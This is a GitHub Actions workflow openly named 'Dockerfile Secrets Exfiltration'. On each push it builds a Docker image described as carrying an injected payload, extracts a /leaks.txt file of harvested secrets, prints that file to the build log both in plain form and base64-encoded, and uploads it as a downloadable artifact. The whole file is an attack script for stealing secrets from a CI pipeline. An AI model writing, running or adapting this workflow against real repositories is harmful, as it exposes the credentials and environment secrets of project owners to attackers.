name: Dockerfile Secrets Exfiltration

on:
  push:
    branches: [main]

jobs:
  build-and-exfil:
    runs-on: ubuntu-latest

    steps:
    - name: Checkout repo
      uses: actions/checkout@v3

    - name: Build Docker image with injected payload
      run: |
        docker build -t leak .

    - name: Extract /leaks.txt from container
      run: |
        docker run --rm leak cat /leaks.txt > full_leaks.txt

    - name: Display environment and found secrets
      run: |
        echo "===== /leaks.txt contents ====="
        cat full_leaks.txt

    - name: Base64 version (for safe copying or binary data)
      run: |
        echo "===== BASE64 Encoded Leaks ====="
        base64 full_leaks.txt

    - name: Upload leak file as artifact
      uses: actions/upload-artifact@v4
      with:
        name: leak-contents
        path: full_leaks.txt
